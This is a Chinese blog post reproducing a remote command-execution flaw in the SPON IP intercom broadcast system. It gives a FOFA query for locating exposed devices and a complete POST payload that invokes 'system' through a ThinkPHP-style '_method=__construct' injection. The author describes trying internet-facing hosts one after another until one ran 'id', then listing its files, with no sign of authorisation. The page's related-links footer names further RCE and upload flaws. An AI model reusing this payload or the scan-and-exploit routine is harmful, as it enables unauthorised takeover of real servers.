SPON IP网络对讲广播系统的命令执行漏洞复现实验

已于 2024-07-31 19:12:45 修改
阅读量740 收藏 7
点赞数 22
文章标签: 安全 web安全
于 2024-07-31 19:06:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140829456
版权

第一步:使用fofa搜索语句搜索

fofa地址:网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

查询漏洞的语句icon_hash="-1830859634"

第二步:访问网址,抓包,将host改为搜到的地址

第三步:将如下的数据包内容复制替换抓到的数据包

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

第四步:发送到重放器查看。

我查到的好几个都是如下图的,显示404,所以没有这个漏洞,一直尝试下一个网站

第一个网址不行的话,再试下一个,直到可以为止,如下图的地方可以直接修改新的目标地址。

我最后抓到了一个有漏洞的,它和之前的显示页面都不一样,显示出了id的参数。

第五步:将s=id改为s=ls(任意cmd的系统命令)

可以看出我的页面里面列出了,,他的当前目录下的文件

Mr.sloane
关注
IP网络广播服务平台upload接口存在任意文件上传漏洞
nnn2188185的博客
09-10 111
IP网络广播服务平台upload接口存在任意文件上传漏洞
海康威视对广播系统RCE漏洞(CVE-2023-6895)
weixin_43567873的博客
03-09 266
海康威视对广播系统RCE漏洞(CVE-2023-6895)
ip网络广播系统服务器,IP网络广播服务器
weixin_30605469的博客
08-05 2050
产品特性IP网络广播控制中心是系统的核心。采用工控机箱设计,触摸屏显示操控,内置功能强大的IP广播控制服务器软件,常用节目素材,大容量节目源空间,用户可以根据自己需求下载或制作录制节目。负责音频流点播服务、计划任务处理、终端管理和权限管理等功能。管理节目库资源,为所有网络适配器提供定时播放和实时点播媒体服务,响应各网络适配器的播放请求,为各音频工作站提供数据接口服务。广播主机可扩展含有4个独立声卡...
ip网络广播系统服务器,IP网络广播系统概述
weixin_36269733的博客
08-05 1589
在传播内容方面,模拟音频广播系统只能使用和传送由卡座、CD机、麦克风等设备输出的模拟信号,对于大量的、以数字格式存储于网络服务器和各种载体上的音频资源无法直接应用。网络音频广播系统支持各种模拟音源的数字化转换,同时作为数字化的音频广播系统,直接应用数字格式的音频资源。当今社会正是以数字化的方向快速发展,越来越多的媒体资源以数字格式存在,数字化网络音频广播系统是必然的发展方向。在应用空间方面,模拟音...
基于fofa的批量cve漏洞验证爬虫程序开发
WonderfulUUZ的博客
01-16 1455
基于fofa的批量cve漏洞验证爬虫程序开发
Hikvision SPON IP网络广播系统命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-26 552
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。tips:这里的图有点问题,转码这个好像是他服务器的原因,我试过yakit和bp都是这样,而且我从来没改过这两软件的编码配置。python ./Hikvision SPON IP网络广播系统命令执行.py -f ./url.txt。
漏洞复现】世邦通信 SPON IP网络广播系统 ping.php 任意命令执行漏洞
凝聚力安全团队
06-21 374
世邦通信 SPON IP网络广播系统 ping.php 存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器。世邦通信 SPON IP网络广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
漏洞复现】Hikvision SPON IP网络广播系统命令执行漏洞(CVE-2023-6895)
做自己喜欢的事,并将其发挥到极致!
01-19 1250
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
漏洞复现】世邦通信 SPON IP网络广播系统 addmediadata.php 任意文件上传漏洞
凝聚力安全团队
06-21 576
世邦通信 SPON IP网络广播系统 addmediadata.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
漏洞复现】Hikvision SPON IP网络广播系统存在命令执行漏洞CVE-2023-6895
失心少年
01-08 1254
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
漏洞复现】世邦通信 SPON IP网络广播系统 uploadjson.php 任意文件上传漏洞
凝聚力安全团队
06-21 449
世邦通信 SPON IP网络广播系统 uploadjson.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。世邦通信 SPON IP网络广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
漏洞情报-世邦IP网络广播系统远程命令执行漏洞CVE-2023-6895
qq_52612931的博客
01-09 1189
海康威视IP网络广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
海康威视IP网络广播系统命令执行漏洞(CVE-2023-6895)
Keepb1ue的博客
12-20 2319
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
iP网络广播系统服务器搭建,IP网络智能公共广播系统V2.0
weixin_32199769的博客
08-10 1596
1.采用图型化人机界面,用户可自定义分区显示图片,用户操作更简便。2.具有分区输出监听与分区现场环境监听功能。3.具有自定义分区、分组功能,可任意设定广播节目的优先等级,最多可设定八级不同优先等级,内置海量歌曲节目,支持节目插播功能。3.可自定义网络寻呼器优先等级。4.支持流媒体扩展中转功能,一台主机支持400个分区,支持无限扩展分区。5.支持远程网络升级与维护功能。6.具有设备状态日志记录功能,...
ip网络广播系统服务器,IP网络广播系统控制软件
weixin_33743292的博客
08-05 1688
产品用途:•系统数据交换、运行及功能控制综合管理平台;•配套IP网络广播系统使用,安装在IP-7900广播工控机上。 产品特点:•系统软件包含有广播服务器软件、用户工作站软件、服务器备份软件及广播终端设置软件;•负责音频流点播服务、计划任务处理、工作站管理、权限管理及基本设置等功能;•为所有网络终端提供定时点播和实时媒体服务,响应各网络终端的请求,为各音频工作站提供数据接口服务;•系统可对所有终...
安全服务面试总结
m0_74402888的博客
10-03 651
from dhtemq') select dirtree,num1,num2 from ##dhtemqxx.xx.xx.xx 执行。入侵的时候 asp 的。正向 Shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。反向 Shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。在 NBSI 中,只要把临时表名加前加##就可以了,但要注意 URL 转码,即。--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 988
信息安全工程师——机房安全分析与防护篇
网 络 安 全
最新发布
数字人生
10-06 1627
定义:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护的状态。范畴硬件安全:包括网络设备、服务器、终端等物理设备的安全。软件安全:包括操作系统、应用软件、数据库等的安全。数据安全:包括数据的保密性、完整性、可用性等。
城市排水工程第二版:理论与实践
2004年,随着技术的更新和需求的变化,进行了第二次修订并由Spon Press出版社再次发行。 《城市排水》的第二版详细探讨了城市排水系统的设计、管理、建设和维护的重要议题。该书涵盖了城市地区面临的洪水控制、雨水...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值